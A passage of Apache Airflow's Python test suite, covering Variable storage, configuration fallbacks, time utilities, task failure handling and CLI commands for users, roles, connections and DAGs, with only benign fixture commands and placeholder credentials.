TI = TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
def test_variable_set_get_round_trip(self):
Variable.set("tested_var_set_id", "Monday morning breakfast")
self.assertEqual("Monday morning breakfast", Variable.get("tested_var_set_id"))
def test_variable_set_get_round_trip_json(self):
value = {"a": 17, "b": 47}
Variable.set("tested_var_set_id", value, serialize_json=True)
self.assertEqual(value, Variable.get("tested_var_set_id", deserialize_json=True))
def test_get_non_existing_var_should_return_default(self):
default_value = "some default val"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value))
def test_get_non_existing_var_should_raise_key_error(self):
with self.assertRaises(KeyError):
Variable.get("thisIdDoesNotExist")
def test_get_non_existing_var_with_none_default_should_return_none(self):
self.assertIsNone(Variable.get("thisIdDoesNotExist", default_var=None))
def test_get_non_existing_var_should_not_deserialize_json_default(self):
default_value = "}{ this is a non JSON default }{"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value,
deserialize_json=True))
def test_variable_setdefault_round_trip(self):
key = "tested_var_setdefault_1_id"
value = "Monday morning breakfast in Paris"
Variable.setdefault(key, value)
self.assertEqual(value, Variable.get(key))
def test_variable_setdefault_round_trip_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Happiness": True}
Variable.setdefault(key, value, deserialize_json=True)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_setdefault_existing_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Happiness": True}
Variable.set(key, value, serialize_json=True)
val = Variable.setdefault(key, value, deserialize_json=True)
        # Check that the returned value and the stored value are handled correctly.
self.assertEqual(value, val)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_delete(self):
key = "tested_var_delete"
value = "to be deleted"
# No-op if the variable doesn't exist
Variable.delete(key)
with self.assertRaises(KeyError):
Variable.get(key)
# Set the variable
Variable.set(key, value)
self.assertEqual(value, Variable.get(key))
# Delete the variable
Variable.delete(key)
with self.assertRaises(KeyError):
Variable.get(key)
def test_parameterized_config_gen(self):
cfg = configuration.parameterized_config(configuration.DEFAULT_CONFIG)
# making sure some basic building blocks are present:
self.assertIn("[core]", cfg)
self.assertIn("dags_folder", cfg)
self.assertIn("sql_alchemy_conn", cfg)
self.assertIn("fernet_key", cfg)
# making sure replacement actually happened
self.assertNotIn("{AIRFLOW_HOME}", cfg)
self.assertNotIn("{FERNET_KEY}", cfg)
def test_config_use_original_when_original_and_fallback_are_present(self):
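        # With both core.fernet_key and core.fernet_key_cmd set, the plain
        # option should take precedence over the _cmd fallback.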
self.assertTrue(conf.has_option("core", "FERNET_KEY"))
self.assertFalse(conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = conf.get('core', 'FERNET_KEY')
with conf_vars({('core', 'FERNET_KEY_CMD'): 'printf HELLO'}):
FALLBACK_FERNET_KEY = conf.get(
"core",
"FERNET_KEY"
)
self.assertEqual(FERNET_KEY, FALLBACK_FERNET_KEY)
def test_config_throw_error_when_original_and_fallback_is_absent(self):
self.assertTrue(conf.has_option("core", "FERNET_KEY"))
self.assertFalse(conf.has_option("core", "FERNET_KEY_CMD"))
with conf_vars({('core', 'fernet_key'): None}):
with self.assertRaises(AirflowConfigException) as cm:
conf.get("core", "FERNET_KEY")
exception = str(cm.exception)
message = "section/key [core/fernet_key] not found in config"
self.assertEqual(message, exception)
def test_config_override_original_when_non_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = "some value"
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_config_override_original_when_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = ""
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_round_time(self):
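        # round_time snaps a datetime to the nearest whole interval,
        # optionally measured from a given start date (third argument).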
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
        # use assert_array_almost_equal from numpy.testing since we are
        # comparing floating point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existent",
dag=self.dag)
def test_terminate_task(self):
"""If a task instance's db state get deleted, it should fail"""
TI = TaskInstance
dag = self.dagbag.dags.get('test_utils')
task = dag.task_dict.get('sleeps_forever')
ti = TI(task=task, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(
task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Running task instance asynchronously
p = multiprocessing.Process(target=job.run)
p.start()
sleep(5)
settings.engine.dispose()
session = settings.Session()
ti.refresh_from_db(session=session)
# making sure it's actually running
self.assertEqual(State.RUNNING, ti.state)
ti = session.query(TI).filter_by(
dag_id=task.dag_id,
task_id=task.task_id,
execution_date=DEFAULT_DATE
).one()
# deleting the instance should result in a failure
session.delete(ti)
session.commit()
# waiting for the async task to finish
p.join()
# making sure that the task ended up as failed
ti.refresh_from_db(session=session)
self.assertEqual(State.FAILED, ti.state)
session.close()
def test_task_fail_duration(self):
"""If a task fails, the duration should be recorded in TaskFail"""
p = BashOperator(
task_id='pass_sleepy',
bash_command='sleep 3',
dag=self.dag)
f = BashOperator(
task_id='fail_sleepy',
bash_command='sleep 5',
execution_timeout=timedelta(seconds=3),
retry_delay=timedelta(seconds=0),
dag=self.dag)
session = settings.Session()
try:
p.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except Exception:
pass
try:
f.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except Exception:
pass
p_fails = session.query(TaskFail).filter_by(
task_id='pass_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
f_fails = session.query(TaskFail).filter_by(
task_id='fail_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
self.assertEqual(0, len(p_fails))
self.assertEqual(1, len(f_fails))
self.assertGreaterEqual(sum([f.duration for f in f_fails]), 3)
def test_run_command(self):
write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))'
cmd = 'import sys; {0}; sys.stdout.flush()'.format(write)
self.assertEqual(run_command("python -c '{0}'".format(cmd)), '\u1000foo')
self.assertEqual(run_command('echo "foo bar"'), 'foo bar\n')
self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"')
def test_trigger_dagrun_with_execution_date(self):
utc_now = timezone.utcnow()
run_id = 'trig__' + utc_now.isoformat()
def payload_generator(context, object): # pylint: disable=unused-argument
object.run_id = run_id
return object
task = TriggerDagRunOperator(task_id='test_trigger_dagrun_with_execution_date',
trigger_dag_id='example_bash_operator',
python_callable=payload_generator,
execution_date=utc_now,
dag=self.dag)
task.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
dag_runs = DagRun.find(dag_id='example_bash_operator', run_id=run_id)
self.assertEqual(len(dag_runs), 1)
dag_run = dag_runs[0]
self.assertEqual(dag_run.execution_date, utc_now)
def test_trigger_dagrun_with_str_execution_date(self):
utc_now_str = timezone.utcnow().isoformat()
self.assertIsInstance(utc_now_str, (str,))
run_id = 'trig__' + utc_now_str
def payload_generator(context, object): # pylint: disable=unused-argument
object.run_id = run_id
return object
task = TriggerDagRunOperator(
task_id='test_trigger_dagrun_with_str_execution_date',
trigger_dag_id='example_bash_operator',
python_callable=payload_generator,
execution_date=utc_now_str,
dag=self.dag)
task.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
dag_runs = DagRun.find(dag_id='example_bash_operator', run_id=run_id)
self.assertEqual(len(dag_runs), 1)
dag_run = dag_runs[0]
self.assertEqual(dag_run.execution_date.isoformat(), utc_now_str)
def test_trigger_dagrun_with_templated_execution_date(self):
task = TriggerDagRunOperator(
            task_id='test_trigger_dagrun_with_templated_execution_date',
trigger_dag_id='example_bash_operator',
execution_date='{{ execution_date }}',
dag=self.dag)
self.assertTrue(isinstance(task.execution_date, str))
self.assertEqual(task.execution_date, '{{ execution_date }}')
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.render_templates()
self.assertEqual(timezone.parse(task.execution_date), DEFAULT_DATE)
def test_externally_triggered_dagrun(self):
TI = TaskInstance
# Create the dagrun between two "scheduled" execution dates of the DAG
EXECUTION_DATE = DEFAULT_DATE + timedelta(days=2)
EXECUTION_DS = EXECUTION_DATE.strftime('%Y-%m-%d')
EXECUTION_DS_NODASH = EXECUTION_DS.replace('-', '')
dag = DAG(
TEST_DAG_ID,
default_args=self.args,
schedule_interval=timedelta(weeks=1),
start_date=DEFAULT_DATE)
task = DummyOperator(task_id='test_externally_triggered_dag_context',
dag=dag)
dag.create_dagrun(run_id=DagRun.id_for_date(EXECUTION_DATE),
execution_date=EXECUTION_DATE,
state=State.RUNNING,
external_trigger=True)
task.run(
start_date=EXECUTION_DATE, end_date=EXECUTION_DATE)
ti = TI(task=task, execution_date=EXECUTION_DATE)
context = ti.get_template_context()
# next_ds/prev_ds should be the execution date for manually triggered runs
self.assertEqual(context['next_ds'], EXECUTION_DS)
self.assertEqual(context['next_ds_nodash'], EXECUTION_DS_NODASH)
self.assertEqual(context['prev_ds'], EXECUTION_DS)
self.assertEqual(context['prev_ds_nodash'], EXECUTION_DS_NODASH)
class TestCli(unittest.TestCase):
TEST_USER1_EMAIL = 'test-user1@example.com'
TEST_USER2_EMAIL = 'test-user2@example.com'
@classmethod
def setUpClass(cls):
super().setUpClass()
cls._cleanup()
def setUp(self):
super().setUp()
from airflow.www import app as application
self.app, self.appbuilder = application.create_app(session=Session, testing=True)
self.app.config['TESTING'] = True
self.parser = cli.CLIFactory.get_parser()
self.dagbag = DagBag(dag_folder=DEV_NULL, include_examples=True)
settings.configure_orm()
self.session = Session
def tearDown(self):
self._cleanup(session=self.session)
for email in [self.TEST_USER1_EMAIL, self.TEST_USER2_EMAIL]:
test_user = self.appbuilder.sm.find_user(email=email)
if test_user:
self.appbuilder.sm.del_register_user(test_user)
for role_name in ['FakeTeamA', 'FakeTeamB']:
if self.appbuilder.sm.find_role(role_name):
self.appbuilder.sm.delete_role(role_name)
super().tearDown()
@staticmethod
def _cleanup(session=None):
if session is None:
session = Session()
session.query(Pool).delete()
session.query(Variable).delete()
session.commit()
session.close()
def test_cli_list_dags(self):
args = self.parser.parse_args(['dags', 'list', '--report'])
cli.list_dags(args)
def test_cli_list_dag_runs(self):
cli.trigger_dag(self.parser.parse_args([
'dags', 'trigger', 'example_bash_operator', ]))
args = self.parser.parse_args(['dags', 'list_runs',
'example_bash_operator',
'--no_backfill'])
cli.list_dag_runs(args)
def test_cli_create_user_random_password(self):
args = self.parser.parse_args([
'users', 'create', '--username', 'test1', '--lastname', 'doe',
'--firstname', 'jon',
'--email', 'jdoe@foo.com', '--role', 'Viewer', '--use_random_password'
])
cli.users_create(args)
def test_cli_create_user_supplied_password(self):
args = self.parser.parse_args([
'users', 'create', '--username', 'test2', '--lastname', 'doe',
'--firstname', 'jon',
'--email', 'jdoe@apache.org', '--role', 'Viewer', '--password', 'test'
])
cli.users_create(args)
def test_cli_delete_user(self):
args = self.parser.parse_args([
'users', 'create', '--username', 'test3', '--lastname', 'doe',
'--firstname', 'jon',
'--email', 'jdoe@example.com', '--role', 'Viewer', '--use_random_password'
])
cli.users_create(args)
args = self.parser.parse_args([
'users', 'delete', '--username', 'test3',
])
cli.users_delete(args)
def test_cli_list_users(self):
for i in range(0, 3):
args = self.parser.parse_args([
'users', 'create', '--username', 'user{}'.format(i), '--lastname',
'doe', '--firstname', 'jon',
'--email', 'jdoe+{}@gmail.com'.format(i), '--role', 'Viewer',
'--use_random_password'
])
cli.users_create(args)
with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
cli.users_list(self.parser.parse_args(['users', 'list']))
stdout = mock_stdout.getvalue()
for i in range(0, 3):
self.assertIn('user{}'.format(i), stdout)
def test_cli_import_users(self):
def assertUserInRoles(email, roles):
for role in roles:
self.assertTrue(self._does_user_belong_to_role(email, role))
def assertUserNotInRoles(email, roles):
for role in roles:
self.assertFalse(self._does_user_belong_to_role(email, role))
assertUserNotInRoles(self.TEST_USER1_EMAIL, ['Admin', 'Op'])
assertUserNotInRoles(self.TEST_USER2_EMAIL, ['Public'])
users = [
{
"username": "imported_user1", "lastname": "doe1",
"firstname": "jon", "email": self.TEST_USER1_EMAIL,
"roles": ["Admin", "Op"]
},
{
"username": "imported_user2", "lastname": "doe2",
"firstname": "jon", "email": self.TEST_USER2_EMAIL,
"roles": ["Public"]
}
]
self._import_users_from_file(users)
assertUserInRoles(self.TEST_USER1_EMAIL, ['Admin', 'Op'])
assertUserInRoles(self.TEST_USER2_EMAIL, ['Public'])
users = [
{
"username": "imported_user1", "lastname": "doe1",
"firstname": "jon", "email": self.TEST_USER1_EMAIL,
"roles": ["Public"]
},
{
"username": "imported_user2", "lastname": "doe2",
"firstname": "jon", "email": self.TEST_USER2_EMAIL,
"roles": ["Admin"]
}
]
self._import_users_from_file(users)
assertUserNotInRoles(self.TEST_USER1_EMAIL, ['Admin', 'Op'])
assertUserInRoles(self.TEST_USER1_EMAIL, ['Public'])
assertUserNotInRoles(self.TEST_USER2_EMAIL, ['Public'])
assertUserInRoles(self.TEST_USER2_EMAIL, ['Admin'])
def test_cli_export_users(self):
user1 = {"username": "imported_user1", "lastname": "doe1",
"firstname": "jon", "email": self.TEST_USER1_EMAIL,
"roles": ["Public"]}
user2 = {"username": "imported_user2", "lastname": "doe2",
"firstname": "jon", "email": self.TEST_USER2_EMAIL,
"roles": ["Admin"]}
self._import_users_from_file([user1, user2])
users_filename = self._export_users_to_file()
with open(users_filename, mode='r') as file:
retrieved_users = json.loads(file.read())
os.remove(users_filename)
# ensure that an export can be imported
self._import_users_from_file(retrieved_users)
def find_by_username(username):
matches = [u for u in retrieved_users
if u['username'] == username]
if not matches:
self.fail("Couldn't find user with username {}".format(username))
else:
matches[0].pop('id') # this key not required for import
return matches[0]
self.assertEqual(find_by_username('imported_user1'), user1)
self.assertEqual(find_by_username('imported_user2'), user2)
def _import_users_from_file(self, user_list):
json_file_content = json.dumps(user_list)
f = NamedTemporaryFile(delete=False)
try:
f.write(json_file_content.encode())
f.flush()
args = self.parser.parse_args([
'users', 'import', f.name
])
cli.users_import(args)
finally:
os.remove(f.name)
def _export_users_to_file(self):
f = NamedTemporaryFile(delete=False)
args = self.parser.parse_args([
'users', 'export', f.name
])
cli.users_export(args)
return f.name
def _does_user_belong_to_role(self, email, rolename):
user = self.appbuilder.sm.find_user(email=email)
role = self.appbuilder.sm.find_role(rolename)
if user and role:
return role in user.roles
return False
def test_cli_add_user_role(self):
args = self.parser.parse_args([
'users', 'create', '--username', 'test4', '--lastname', 'doe',
'--firstname', 'jon',
'--email', self.TEST_USER1_EMAIL, '--role', 'Viewer', '--use_random_password'
])
cli.users_create(args)
self.assertFalse(
self._does_user_belong_to_role(email=self.TEST_USER1_EMAIL,
rolename='Op'),
"User should not yet be a member of role 'Op'"
)
args = self.parser.parse_args([
'users', 'add_role', '--username', 'test4', '--role', 'Op'
])
cli.users_manage_role(args, remove=False)
self.assertTrue(
self._does_user_belong_to_role(email=self.TEST_USER1_EMAIL,
rolename='Op'),
"User should have been added to role 'Op'"
)
def test_cli_remove_user_role(self):
args = self.parser.parse_args([
'users', 'create', '--username', 'test4', '--lastname', 'doe',
'--firstname', 'jon',
'--email', self.TEST_USER1_EMAIL, '--role', 'Viewer', '--use_random_password'
])
cli.users_create(args)
self.assertTrue(
self._does_user_belong_to_role(email=self.TEST_USER1_EMAIL,
rolename='Viewer'),
"User should have been created with role 'Viewer'"
)
args = self.parser.parse_args([
'users', 'remove_role', '--username', 'test4', '--role', 'Viewer'
])
cli.users_manage_role(args, remove=True)
self.assertFalse(
self._does_user_belong_to_role(email=self.TEST_USER1_EMAIL,
rolename='Viewer'),
"User should have been removed from role 'Viewer'"
)
@mock.patch("airflow.bin.cli.DagBag")
def test_cli_sync_perm(self, dagbag_mock):
self.expect_dagbag_contains([
DAG('has_access_control',
access_control={
'Public': {'can_dag_read'}
}),
DAG('no_access_control')
], dagbag_mock)
self.appbuilder.sm = mock.Mock()
args = self.parser.parse_args([
'sync_perm'
])
cli.sync_perm(args)
assert self.appbuilder.sm.sync_roles.call_count == 1
self.assertEqual(2,
len(self.appbuilder.sm.sync_perm_for_dag.mock_calls))
self.appbuilder.sm.sync_perm_for_dag.assert_any_call(
'has_access_control',
{'Public': {'can_dag_read'}}
)
self.appbuilder.sm.sync_perm_for_dag.assert_any_call(
'no_access_control',
None,
)
def expect_dagbag_contains(self, dags, dagbag_mock):
dagbag = mock.Mock()
dagbag.dags = {dag.dag_id: dag for dag in dags}
dagbag_mock.return_value = dagbag
def test_cli_create_roles(self):
self.assertIsNone(self.appbuilder.sm.find_role('FakeTeamA'))
self.assertIsNone(self.appbuilder.sm.find_role('FakeTeamB'))
args = self.parser.parse_args([
'roles', 'create', 'FakeTeamA', 'FakeTeamB'
])
cli.roles_create(args)
self.assertIsNotNone(self.appbuilder.sm.find_role('FakeTeamA'))
self.assertIsNotNone(self.appbuilder.sm.find_role('FakeTeamB'))
def test_cli_create_roles_is_reentrant(self):
self.assertIsNone(self.appbuilder.sm.find_role('FakeTeamA'))
self.assertIsNone(self.appbuilder.sm.find_role('FakeTeamB'))
args = self.parser.parse_args([
'roles', 'create', 'FakeTeamA', 'FakeTeamB'
])
cli.roles_create(args)
self.assertIsNotNone(self.appbuilder.sm.find_role('FakeTeamA'))
self.assertIsNotNone(self.appbuilder.sm.find_role('FakeTeamB'))
def test_cli_list_roles(self):
self.appbuilder.sm.add_role('FakeTeamA')
self.appbuilder.sm.add_role('FakeTeamB')
with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
cli.roles_list(self.parser.parse_args(['roles', 'list']))
stdout = mock_stdout.getvalue()
self.assertIn('FakeTeamA', stdout)
self.assertIn('FakeTeamB', stdout)
def test_cli_list_tasks(self):
for dag_id in self.dagbag.dags.keys():
args = self.parser.parse_args(['tasks', 'list', dag_id])
cli.list_tasks(args)
args = self.parser.parse_args([
'tasks', 'list', 'example_bash_operator', '--tree'])
cli.list_tasks(args)
def test_cli_list_jobs(self):
args = self.parser.parse_args(['dags', 'list_jobs'])
cli.list_jobs(args)
def test_cli_list_jobs_with_args(self):
args = self.parser.parse_args(['dags', 'list_jobs', '--dag_id',
'example_bash_operator',
'--state', 'success',
'--limit', '100'])
cli.list_jobs(args)
@mock.patch("airflow.bin.cli.db.initdb")
def test_cli_initdb(self, initdb_mock):
cli.initdb(self.parser.parse_args(['db', 'init']))
initdb_mock.assert_called_once_with()
@mock.patch("airflow.bin.cli.db.resetdb")
def test_cli_resetdb(self, resetdb_mock):
cli.resetdb(self.parser.parse_args(['db', 'reset', '--yes']))
resetdb_mock.assert_called_once_with()
def test_cli_connections_list(self):
with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
cli.connections_list(self.parser.parse_args(['connections', 'list']))
stdout = mock_stdout.getvalue()
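        # The CLI renders connections as a bordered table: data rows fall on
        # alternating lines, and the first two quoted fields of each row are
        # the conn_id and conn_type.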
conns = [[x.strip("'") for x in re.findall(r"'\w+'", line)[:2]]
for ii, line in enumerate(stdout.split('\n'))
if ii % 2 == 1]
conns = [conn for conn in conns if len(conn) > 0]
# Assert that some of the connections are present in the output as
# expected:
self.assertIn(['aws_default', 'aws'], conns)
self.assertIn(['hive_cli_default', 'hive_cli'], conns)
self.assertIn(['emr_default', 'emr'], conns)
self.assertIn(['mssql_default', 'mssql'], conns)
self.assertIn(['mysql_default', 'mysql'], conns)
self.assertIn(['postgres_default', 'postgres'], conns)
self.assertIn(['wasb_default', 'wasb'], conns)
self.assertIn(['segment_default', 'segment'], conns)
def test_cli_connections_list_redirect(self):
cmd = ['airflow', 'connections', 'list']
with tempfile.TemporaryFile() as fp:
p = subprocess.Popen(cmd, stdout=fp)
p.wait()
self.assertEqual(0, p.returncode)
def test_cli_connections_add_delete(self):
# Add connections:
uri = 'postgresql://airflow:airflow@host:5432/airflow'
with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new1',
'--conn_uri=%s' % uri]))
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new2',
'--conn_uri=%s' % uri]))
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new3',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new4',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new5',
'--conn_type=hive_metastore', '--conn_login=airflow',
'--conn_password=airflow', '--conn_host=host',
'--conn_port=9083', '--conn_schema=airflow']))
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new6',
'--conn_uri', "", '--conn_type=google_cloud_platform', '--conn_extra', "{'extra': 'yes'}"]))
stdout = mock_stdout.getvalue()
# Check addition stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tSuccessfully added `conn_id`=new1 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new2 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new3 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new4 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new5 : " +
"hive_metastore://airflow:airflow@host:9083/airflow"),
("\tSuccessfully added `conn_id`=new6 : " +
"google_cloud_platform://:@:")
])
# Attempt to add duplicate
with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new1',
'--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tA connection with `conn_id`=new1 already exists",
])
# Attempt to add without providing conn_uri
with self.assertRaises(SystemExit) as exc:
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new']))
self.assertEqual(
exc.exception.code,
"The following args are required to add a connection: ['conn_uri or conn_type']"
)
        # Prepare to verify the added connections
session = settings.Session()
extra = {'new1': None,
'new2': None,
'new3': "{'extra': 'yes'}",
'new4': "{'extra': 'yes'}"}
        # Verify the added connections
for index in range(1, 6):
conn_id = 'new%s' % index
result = (session
.query(Connection)
.filter(Connection.conn_id == conn_id)
.first())
result = (result.conn_id, result.conn_type, result.host,
result.port, result.get_extra())
if conn_id in ['new1', 'new2', 'new3', 'new4']:
self.assertEqual(result, (conn_id, 'postgres', 'host', 5432,
extra[conn_id]))
elif conn_id == 'new5':
self.assertEqual(result, (conn_id, 'hive_metastore', 'host',
9083, None))
elif conn_id == 'new6':
self.assertEqual(result, (conn_id, 'google_cloud_platform',
None, None, "{'extra': 'yes'}"))
# Delete connections
with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
cli.connections_delete(self.parser.parse_args(
['connections', 'delete', 'new1']))
cli.connections_delete(self.parser.parse_args(
['connections', 'delete', 'new2']))
cli.connections_delete(self.parser.parse_args(
['connections', 'delete', 'new3']))
cli.connections_delete(self.parser.parse_args(
['connections', 'delete', 'new4']))
cli.connections_delete(self.parser.parse_args(
['connections', 'delete', 'new5']))
cli.connections_delete(self.parser.parse_args(
['connections', 'delete', 'new6']))
stdout = mock_stdout.getvalue()
# Check deletion stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tSuccessfully deleted `conn_id`=new1",
"\tSuccessfully deleted `conn_id`=new2",
"\tSuccessfully deleted `conn_id`=new3",
"\tSuccessfully deleted `conn_id`=new4",
"\tSuccessfully deleted `conn_id`=new5",
"\tSuccessfully deleted `conn_id`=new6"
])
# Check deletions
for index in range(1, 7):
conn_id = 'new%s' % index
result = (session.query(Connection)
.filter(Connection.conn_id == conn_id)
.first())
self.assertTrue(result is None)
# Attempt to delete a non-existing connection
with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
cli.connections_delete(self.parser.parse_args(
['connections', 'delete', 'fake']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tDid not find a connection with `conn_id`=fake",
])
session.close()
def test_cli_test(self):
cli.test(self.parser.parse_args([
'tasks', 'test', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'tasks', 'test', 'example_bash_operator', 'runme_0', '--dry_run',
DEFAULT_DATE.isoformat()]))
def test_cli_test_with_params(self):
cli.test(self.parser.parse_args([
'tasks', 'test', 'example_passing_params_via_test_command', 'run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'tasks', 'test', 'example_passing_params_via_test_command', 'also_run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
def test_cli_run(self):
cli.run(self.parser.parse_args([
'tasks', 'run', 'example_bash_operator', 'runme_0', '-l',
DEFAULT_DATE.isoformat()]))
def test_task_state(self):
cli.task_state(self.parser.parse_args([
'tasks', 'state', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
def test_dag_state(self):
self.assertEqual(None, cli.dag_state(self.parser.parse_args([
'dags', 'state', 'example_bash_operator', DEFAULT_DATE.isoformat()])))
def test_pause(self):
args = self.parser.parse_args([
'dags', 'pause', 'example_bash_operator'])
cli.pause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [True, 1])
args = self.parser.parse_args([
'dags', 'unpause', 'example_bash_operator'])
cli.unpause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [False, 0])
def test_subdag_clear(self):
args = self.parser.parse_args([
'tasks', 'clear', 'example_subdag_operator', '--yes'])
cli.clear(args)
args = self.parser.parse_args([
'tasks', 'clear', 'example_subdag_operator', '--yes', '--exclude_subdags'])
cli.clear(args)
def test_parentdag_downstream_clear(self):
args = self.parser.parse_args([
'tasks', 'clear', 'example_subdag_operator.section-1', '--yes'])
cli.clear(args)
args = self.parser.parse_args([
'tasks', 'clear', 'example_subdag_operator.section-1', '--yes',
'--exclude_parentdag'])
cli.clear(args)
def test_get_dags(self):
dags = cli.get_dags(self.parser.parse_args(['tasks', 'clear', 'example_subdag_operator',
'--yes']))
self.assertEqual(len(dags), 1)
dags = cli.get_dags(self.parser.parse_args(['tasks', 'clear', 'subdag', '-dx', '--yes']))
self.assertGreater(len(dags), 1)
with self.assertRaises(AirflowException):
cli.get_dags(self.parser.parse_args(['tasks', 'clear', 'foobar', '-dx', '--yes']))
def test_process_subdir_path_with_placeholder(self):
self.assertEqual(os.path.join(settings.DAGS_FOLDER, 'abc'), cli.process_subdir('DAGS_FOLDER/abc'))
def test_trigger_dag(self):
cli.trigger_dag(self.parser.parse_args([
'dags', 'trigger', 'example_bash_operator',
'-c', '{"foo": "bar"}']))
self.assertRaises(
ValueError,
cli.trigger_dag,
self.parser.parse_args([
'dags', 'trigger', 'example_bash_operator',
'--run_id', 'trigger_dag_xxx',
'-c', 'NOT JSON'])
)
def test_delete_dag(self):
DM = DagModel
key = "my_dag_id"
session = settings.Session()
session.add(DM(dag_id=key))
session.commit()
cli.delete_dag(self.parser.parse_args([
'dags', 'delete', key, '--yes']))
self.assertEqual(session.query(DM).filter_by(dag_id=key).count(), 0)
self.assertRaises(
AirflowException,
cli.delete_dag,
self.parser.parse_args([
'dags', 'delete',
